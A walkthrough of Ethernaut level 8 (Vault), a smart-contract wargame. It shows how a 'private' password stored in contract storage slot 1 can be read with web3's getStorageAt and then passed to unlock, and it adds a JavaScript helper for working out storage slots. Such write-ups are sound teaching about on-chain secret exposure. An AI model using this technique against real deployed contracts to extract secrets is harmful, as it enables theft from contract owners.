This is level 8 of the Ethernaut game.
Pre-requisites
- Layout of state variables in Solidity
- Reading storage at a slot in contract
Hack
Given contract:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.6.0;

    contract Vault {
        bool public locked;
        bytes32 private password;

        constructor(bytes32 _password) public {
            locked = true;
            password = _password;
        }

        function unlock(bytes32 _password) public {
            if (password == _password) {
                locked = false;
            }
        }
    }
The player has to set locked to false.
The only way is to call unlock with the correct password.
Although the password state variable is private, anyone can still read a storage variable by determining its storage slot. Therefore sensitive information should not be stored on-chain, even if it is declared private.
Above, locked is a bool and occupies slot 0. A bytes32 needs a full 32-byte slot, so it cannot be packed next to locked, and the password ends up at storage slot 1 in Vault.
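The slot numbering can be worked out mechanically when reviewing which "private" fields of a contract are exposed. The following is an added example, not part of the original post: `storageLayout`, `slotOf`, `VAULT` and `WIDER` are hypothetical names, `WIDER` is a constructed variant, and the code assumes only fixed-size value types with no inherited state and no constant or immutable variables.

```javascript
// Byte sizes of the value types this sketch supports.
const TYPE_SIZES = {
  bool: 1, uint8: 1, uint16: 2, uint32: 4, uint64: 8,
  uint128: 16, address: 20, uint256: 32, bytes32: 32,
};

// Assign slots in declaration order, following Solidity's packing rule:
// consecutive variables share a 32-byte slot while they fit; a variable
// that does not fit in the remaining space starts the next slot.
// `offset` is counted in bytes from the low-order end of the slot.
function storageLayout(vars) {
  const layout = [];
  let slot = 0;
  let offset = 0; // bytes already used in the current slot
  for (const { name, type } of vars) {
    const size = TYPE_SIZES[type];
    if (size === undefined) throw new Error(`unsupported type: ${type}`);
    if (offset + size > 32) {
      slot += 1;
      offset = 0;
    }
    layout.push({ name, type, slot, offset, size });
    offset += size;
  }
  return layout;
}

function slotOf(vars, name) {
  const entry = storageLayout(vars).find((v) => v.name === name);
  if (!entry) throw new Error(`no such variable: ${name}`);
  return entry.slot;
}

// State variables of Vault, in declaration order.
const VAULT = [
  { name: "locked", type: "bool" },
  { name: "password", type: "bytes32" },
];

// Constructed variant: three small fields pack into slot 0, uint128 no
// longer fits and takes slot 1, which moves the password to slot 2.
const WIDER = [
  { name: "locked", type: "bool" },
  { name: "owner", type: "address" },
  { name: "nonce", type: "uint64" },
  { name: "fee", type: "uint128" },
  { name: "password", type: "bytes32" },
];
```

Every slot this returns is readable by anyone with node access, regardless of the variable's visibility.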
Let's read it:
    password = await web3.eth.getStorageAt(contract.address, 1)
Call unlock with password:
    await contract.unlock(password)
Unlocked. Verify by:
    await contract.locked() === false
And that's it.